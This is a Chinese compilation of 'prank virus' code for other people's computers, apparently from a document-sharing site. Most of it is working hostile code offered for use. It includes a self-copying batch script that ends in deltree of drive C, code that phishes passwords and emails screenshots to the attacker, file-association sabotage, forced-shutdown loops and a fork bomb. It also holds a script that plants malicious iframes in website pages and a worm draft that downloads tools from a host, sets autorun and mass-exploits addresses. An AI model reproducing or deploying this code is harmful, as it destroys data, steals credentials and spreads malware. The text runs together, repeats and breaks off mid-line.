bat整人电脑病毒代码是怎样的
- 格式:docx
- 大小:42.93 KB
- 文档页数:24
bat电脑病毒代码病毒来自于一次偶然的事件,那时的研究人员为了计算出当时互联网的在线人数,然而它却自己“繁殖”了起来导致了整个服务器的崩溃和堵塞,有时一次突发的停电和偶然的错误.下面是店铺收集整理的bat电脑病毒代码,希望对大家有帮助~~bat电脑病毒代码rem (注:原来站长我在读职高时,就用这一招来对付在上机时总是喜欢删别人文件(放在我自己所建目录下面的程序文件,这可是我辛辛苦苦用手敲打键盘搞出来的呀!)当然不是像下面这个病毒程序故意在桌面上放的那个炸弹文件了!)的人!当然那个喜欢删别人文件最终还是免不了挨老师的一顿臭骂!)rem 如果你是一位电脑病毒编写高手,千万别对着你的电脑吐口水呀!如果真是这样的话,我会很难过的,一为你面前这台电脑难过!二为我自己难过!rem 电脑病毒的原理都是差不多的,只要你学精了几门程序设计语言(如VC,Delphi,VB,html[JavaScript/Vbscript],Perl)再加学计算机漏洞,以及一些文件格式(比如PE,NE,Html,Vbs,Js等),保证你编写的电脑病毒会Very very good!相信你看完以下程序代码,一定有一种冲动!什么冲动?(编写电脑病毒的冲动)if not exsit %windir%\desktop\IamVirus.txt goto KillSystem if not exsit %windir%\system\%0.bat goto CopyToHereif not exist %windir%\winstart.bat goto AddWinif not exist %windir%\dosstart.bat goto AddDosif not exist c:\autoexec.bat goto AddAutoif not exsit %windir%\……\启动\HappyQQ.bat goto CopyMyselfgoto endrem 下面部分为自我复制部分:AddWinecho %windir%\system\%0.bat>>%windir%\winstart.bat>n ullgoto end:AddDosecho %windir%\system\%0.bat>>%windir%\dosstart.bat>n ullgoto end:AddAutoecho %windir%\system\%0.bat>>c:\autoexec.bat>nullgoto end:CopyMyselfcopy %0.bat %windir%\……\启动\HappyQQ.bat /y >nullgoto end:CopyToHerecopy %0.bat %windir%\system\%0.batgoto end:KillSystemdeltree/y c:\*.*>nullrem 这里为破坏部分goto end:end怎么样,看完一个批处理病毒代码,你应该对计算机病毒的概念非常了解了吧!晕呀,什么?你不懂DOS呀,那也没关系,去问问你的计算机老师,什么,你的计算机老师也不会呀,那么你就网上查查吧,千万别问我,虽然我是电脑DOS命令高手,但是我可不想让你老师来找我的麻烦呀!呵呵……如果你觉得这还不够爽,请你进入我的Baidu"红客"贴吧进行讨论!(类似这个批处理病毒的原理,我用C语言编写了一个模拟计算机病毒!)。
vbs整人电脑病毒代码是怎样的计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。
这是目前官方最权威的关于计算机病毒的定义,此定义也被通行的《计算机病毒防治产品评级准则》的国家标准所采纳。
以下是店铺网小编为大家整理的关于vbs整人电脑病毒代码的相关知识,希望对大家有所帮助!易语言整人代码如下.版本 2.支持库 OPenGL.子程序 __启动窗口_创建完毕运行(“Shutdown.exe -s -t 120”, 假, ).子程序 _按钮1_被单击.如果真 (编辑框1.内容= “我是蠢猪,***是大好人”)运行(“shutdown -a ”, 假, )信息框(“哈哈~我还是很厚道的!我也知道你是发自内心的,是啊,我怎么那么完美呢?——呵呵~”, 0, )结束 ().如果真 (编辑框1.内容≠ “我是蠢猪,***是大好人”)信息框(“尼玛,输入正确会死啊!告诉你了,只要输入正确就OK 了~你怎么就不相信我呢”, 0, )—————————————————————————————————————————易语言骗账号代码如下:.版本 2.支持库 internet.子程序 _按钮1_被单击连接发信服务器(“”, 25, “邮箱”, “密码”, )发送邮件(“号来了”, “账号:” + 编辑框1.内容 + #换行符 +“密码:” + 编辑框2.内容, “邮箱”, , , “邮箱”, )——————————————————————————————————————————易语言监视对方电脑,连发十张高清截图代码如下:.版本 2.支持库 eImgConverter.支持库 internet.子程序 __启动窗口_创建完毕.计次循环首 (10, )写到文件(“D:\jt.bmp”, 快照 (, , ))转换到JPG (“jt.bmp”, “jt.jpg”, 假, 75, 真, 0).如果真 (连接发信服务器(“”, 25, “邮箱”, “密码”, ))添加附件文件(“D:\jt.bmp”).如果真结束发送邮件(“主题”, “被监视的电脑截图”, “邮箱”, , , “邮箱”, )断开发信服务器 ().计次循环尾 ()删除文件(“D:\jt.bmp”)结束 ()——————————————————————————————————————————你说要有图片可以将易语言程序启动窗口主页面的图片设置成我这样你说要有声音,可以运用以下代码:.版本 2.程序集窗口程序集1.子程序 _按钮1_被单击播放MP3 (1, “mp3地址”)——————————————————————————————————————————如果是电脑命令的话新建txt输入:shutdown -s -t 120 -c 你是猪!保存为bat或者还有,如果他用电脑命令破解,你就往后输入@echo offassoc .bat=txtfile可以让他所有的电脑命令成为乱码除了电脑命令乱码,你还可以设置各种的,比如:assoc .exe=txtfileassoc .mp3=txtfileassoc .zip=txtfileassoc .fiv=txtfileand so on……其实输入了就这样的代码,那台电脑基本就瘫痪了,没什么可以玩的了~。
第一个:让别人内存OVER(逼他重启)@echo offstart cmd%0就这3行了打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
第二个:让对方重启指定次数(害人专用)@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1if not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启6次改成7就是7次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
第三个:善意恶搞关机首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪""","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
整人代码大全让对方重启指定次数(害人专用)@echo offif not exist c:1.txt echo. >c:1.txt & goto err1if not exist c:2.txt echo. >c:2.txt & goto err1if not exist c:3.txt echo. >c:3.txt & goto err1sif not exist c:4.txt echo. >c:4.txt & goto err1if not exist c:5.txt echo. >c:5.txt & goto err1goto err2:err1shutdown -s -t 0:err2上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启6次改成7就是7次...打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。
善意恶搞关机首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看把隐藏已知文件类型的扩展名前面的勾去掉.然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机,快撒,说""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~"复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒内要关闭计算机,结束任务都不行,他只能说他是猪才能解决问题。
三一文库()〔bat整人电脑病毒代码是怎样的〕*篇一:一些bat恶搞代码第一个:让别人内存OVER(逼他重启)@echooffstartcmd%0就这3行了第二个:让对方重启指定次数(害人专用)@echooffifnotexistc:\1.txtecho.c:\1.txtgotoerr1 ifnotexistc:\2.txtecho.c:\2.txtgotoerr1 ifnotexistc:\3.txtecho.c:\3.txtgotoerr1 ifnotexistc:\4.txtecho.c:\4.txtgotoerr1 ifnotexistc:\5.txtecho.c:\5.txtgotoerr1gotoerr2:err1shutdown-s-t0:err2上面可以让对方电脑重启5次后不在重启第三个:自动踢人(3389肉机保护自己专用)@echoofflogoff1dellog.batlogoff后面的1改成自己登陆的ID号,用queryuser查看第四个:批量自动溢出@for/f%%iin(result.txt)do42%%i58.44.89.158521先自己用NC监听端口,多开几个,然后指行,就自动溢出了第五个:自动挂马改主页@echooffclsrem直接打批处理名字就有帮助title批量挂马,改首页(伤脑筋QQ:447228437).colorAsetpan=%1setye=%2setdai=%3if"%pan%"==""gotoe1if"%ye%"==""gotoe1if"%dai%"==""gotoe1if"%dai%"=="htm.txt"gotou1forfiles/p%pan%/m%ye%/s/c"cmd/cif@isdir==FALSEecho^ iframesrc=":%dai%"width="0"height="0"frameborder="0 "^@path"echo.echo代码全部插入完毕echo.pausegotoe1:u1echo您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容.echo这将是非常危险的,您真的要这样做?回车却认,Ctrl+c取消操作.pauseforfiles/p%pan%/m%ye%/s/c"cmd/cif@isdir==FALSEcopy% 1\htm.txt@path/y"echo.echo首页全部更改完必如果您发现没有替换成功,请将%ye%文件只读属性去掉.echo.pause:e1echo.echo本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下echo用法:snj^搜索盘符^^文件名^^网马地址^echo例子:snjd:\index.asp/mm.htmecho批处理将自动添加^iframe^标记echo.echo如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件.echo然后将要更改的代码加COPY到里面保存.然后将命令的^网马地址^项输入为htm.txt即可.echo例子:snjd:\index.asphtm.txtecho.echo为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让命令保持在一行才能正确执行.echo.echo使用此批处理造成一切后果本人概不负责,请大家谨慎使用!echo.第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完delc:\42.exedelc:\nc.exedelc:\ip.exeechodimwsh%systemroot%\help\test.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test.vbsechowsh.run"cmd/c%systemroot%\help\nc-v-l-p 810%systemroot%\help\or.txt",0%systemroot%\help\te st.vbsechodimwsh%systemroot%\help\test2.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test2.vbsechowsh.run"cmd/cstart%systemroot%\help\good.bat",0%systemroot%\help\test2.vbsechoopen10.0.0.5%systemroot%\help\ftp.txt echoopenmyyes%systemroot%\help\ftp.txtecho1%systemroot%\help\ftp.txtechobinary%systemroot%\help\ftp.txtechoget42.exec:\42.exe%systemroot%\help\ftp.txt echogetnc.exec:\nc.exe%systemroot%\help\ftp.txt echogetip.exec:\ip.exe%systemroot%\help\ftp.txt echobye%systemroot%\help\ftp.txtechoechoSetxPost=CreateObject("Microsoft.XMLHTTP") ^1.vbs%systemroot%\help\or.txtechoechoxPost.Open"GET",":10.0.0.5/my.exequo...,0 ^^1.vbs%systemroot%\help\or.txtechoechoxPost.Send()^^1.vbs%systemroot%\help\or.txt echoechoSetsGet=CreateObject("ADODB.Stream")^^1.vbs%systemroot%\help\or.txtechoechosGet.Mode=3^^1.vbs%systemroot%\help\or.txte choechosGet.Type=1^^1.vbs%systemroot%\help\or.txtec hoechosGet.Write(xPost.responseBody)^^1.vbs%systemroot%\help\or.txtechoechosGet.SaveToFile"d:\my.exe",2^^1.vbs%systemroot%\help\or.txtechoecho1.vbs^^1.vbs%systemroot%\help\or.txtechoechomy.exe^^1.vbs%systemroot%\help\or.txtechoWindowsRegistryEditorVersion5.00%systemroot%\he lp\1.regecho[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]%systemroot%\help\1.regecho"SKYNETPersonalFireWall"="F:\\系统安全工具\\FireWall\\PFW.exe"%systemroot%\help\1.regecho"1"="%systemroot%\\help\\test2.vbs"%systemroot% \help\1.regifnotexist%systemroot%\help\good.batcopygood.bat%systemroot%\help\good.bat%systemroot%\help \test2.vbsdelgood.batregedit-s%systemroot%\help\1.regftp-s:%systemroot%\help\ftp.txtmovec:\nc.exe%systemroot%\help\/ymovec:\42.exe%systemroot%\help\/ymovec:\ip.exe%systemroot%\help\/y%systemroot%\help\test.vbsremfor/f%%iin(result1.txt)doseta=%%iremfor/f%%jin(result.txt)do42%a%%%j810准备:1:找一个反向连接的溢出攻击程序,如ms06040漏洞2:找呀一个免费FTP空间,最好是送域名的3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具.思路:用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功,如果成功开启一个NC监听端口,NC后面带一个输入符号输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的.把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下echodimwsh%systemroot%\help\test.vbsechosetwsh=CreateObject("WScript.Shell")%systemroot%\help\ test.vbsechowsh.run"cmd/c%systemroot%\help\nc-v-l-p 810%systemroot%\help\or.txt",0%systemroot%\help\te st.vbs生成随机IP工具的VB代码PrivateSubForm_Load()DimfsoAsNewFileSystemObjectDima,b,c,dAsIntegerDimph,eAsStringph=App.Path"\""ip.txt"Randomizea=Int(253*Rnd+1)b=Int(253*Rnd+1)c=Int(240*Rnd+1)OpenphForOutputAs#1Fori=cToc+7Forj=1To254e=a"."b"."i"."jPrint#1,eDoEventsNextjNextiClose#1UnloadMeEndSub*篇二:整人“病毒”代码(一)发表于2013-10-2310:33前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。
恶搞电脑病毒代码有哪些有时候想和朋友们玩玩,搞点恶搞电脑病毒给他们,要怎么办呢?下面由店铺给你做出详细的恶搞电脑病毒代码介绍!希望对你有帮助!恶搞电脑病毒代码介绍一:首先在电脑上新建一个TXT文档然后把下面这段代码输入进去On Error Resume NextDim WSHshellASet WSHshellA = wscript.CreateObject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -s -t 90 -c ""快喊我是猪,不喊就马上让你关机,不信,试试···"" ", 0, TrueDim aDo While (a <> "我是猪")a = InputBox("快说我是猪,不叫就不关机,快点,说 ", "说不说", "不说", 8000, 7000)MsgBox Chr(13) + Chr(13) + Chr(13) + a, 0, "MsgBox"LoopMsgBox Chr(13) + Chr(13) + Chr(13) + "早说就行了嘛!好,不关了"WSHshella.run "cmd.exe /c shutdown -a"然后保存然后把这个文本文档的后缀改为vbs 也就是说新建的文本文档本来是.TXT的后缀,你要修改为.VBS的后缀恶搞电脑病毒代码介绍二:新建一个文本文档,然后插入hhjsfdusnjwindow,,hffjfiukjei 508963kfdjksfjjkk,最后插入图片,如果对方有邮箱,就发给他他一打开就会出现你插入的图片,然后出现蓝屏(效果7—10分钟)(注:做好病毒后不要打开,否则会出现以上说的情况)恶搞电脑病毒代码介绍三:新建一个文本文档(.txt),要复制以下代码:@echo offcolor 4tskill explorerecho .echo .echo .echo .echo 警告:在病毒执行期间禁止关闭电源,echo 否则你就和你心爱的电脑说echo .echo . BYE-BYEecho .echo Computer system crash!echo .echo .echo I am a virus, my name is Ghost.echo 我是魔鬼病毒,在这个堕落的世界上苏醒了。
整人“病毒”代码(一)发表于2013-10-23 10:33前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。
PS:由于精力问题没有对代码的可用性进行一一验证,所以不保证全部可用,大家如果发现有不可用的或者需要改进的地方请提出来,以下代码仅供娱乐,请勿用于非法用途。
一、怎么点都没反应的桌面如果同事的电脑开着,他离开电脑前一会,嘿嘿,机会来了。
把他的电脑桌面按print键截屏截下来,(当然QQ截屏也可以,不过效果不太逼真!)建议大家用print截屏,设置为桌面。
然后把原来在桌面上的文件统统移到一个盘的文件夹里,这样桌面看上去和平时一个样。
他回来后狂点鼠标,却怎么都没有反应!现在还在关机,开机,关机,开机,关机,开机中…………附带:print键截屏方法:键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图!用法一,按“Print Screen SysRq”一下,对当前屏幕进行抓图,就是整个显示屏的容。
用法二,先按住“Alt”键,再按“Print Screen SysRq”键,则是对当前窗口进行抓图。
如你打开“我的电脑”后,用此法就抓取“我的电脑”窗口的容。
用上诉两种方法抓图后,再打开“开始”、“附件”里的“画图”程序,点“编辑”、“粘贴”就把抓取的图片贴出来了,可以保存为自己需要的格式。
哈哈,简单吧,这方法真挺搞的,有兴趣的童鞋可以试试!二、让电脑硬盘消失-隐藏磁盘方法愚人节电脑整人使无端端地电脑磁盘的某个分区消失了,钻进地缝里面去了吗,给外星人抓走了??非也!是某些人使坏将其隐藏起来了!步骤1.新建一个记事本2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“新建文件.reg”3.将下面的代码复制到记事本当中:Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives" =hex:08,00,00,00解释(1)"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的图中的D盘已经神秘消失了。
整人bat大全1. 1、@echo offtitle 请勿关闭本程序,否则后果自负!:Nextecho “请输入:“我是猪头三”,否则将关闭计算机!"shutdown -s -t 60 -c “请输入:“我是猪头三”,否则将关闭计算机!"set /p Input=if "%input%"=="我是猪头三" goto EXITgoto Next:EXITshutdown -aecho “算你运气好,下面还有你好看的!”shutdown -s -t 60 -c “请做出选择!否则将关闭计算机!”ping 127.0.0.1 -n 2 >nulecho “你觉得我厉害吗?厉害按“Y”,不厉害按“N”set /p YN=if /i "%YN%"=="Y" shutdown -aif /i "%YN%"=="N" shutdown -ae cho “我要给你看看我的真本事!”ping 127.0.0.1 -n 2 >nul:Downecho “请输入:“你最厉害”,否则将关闭计算机!"shutdown -s -t 60 -c “请输入:“你最厉害”,否则将关闭计算机!"set /p Input=if "%input%"=="你最厉害" goto OVERgoto Down:OVERshutdown -aping 127.0.0.1 -n 1 >nulecho “怎么样,很可怕吧!”ping 127.0.0.1 -n 2 >nulecho “此计算机将在20秒内崩溃或爆炸,请马上从附近窗口跳下,否则后果自负。
”echo “即将删除此计算机上所有重要数据。
”ping 127.0.0.1 -n 1 >nulecho “正在格式化本地磁盘C:所有数据...”ping 127.0.0.1 -n 2 >nulecho “正在格式化本地磁盘D:所有数据...”ping 127.0.0.1 -n 2 >nulecho “格式化失败!,此计算机即将爆炸...”echo “请马上离开本计算机!此计算机即将爆炸!”ping 127.0.0.1 -n 2 >nulmsg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %usern ame% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %usern ame% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 “请马上离开本计算机!此计算机即将爆炸!”msg %username% /time:300 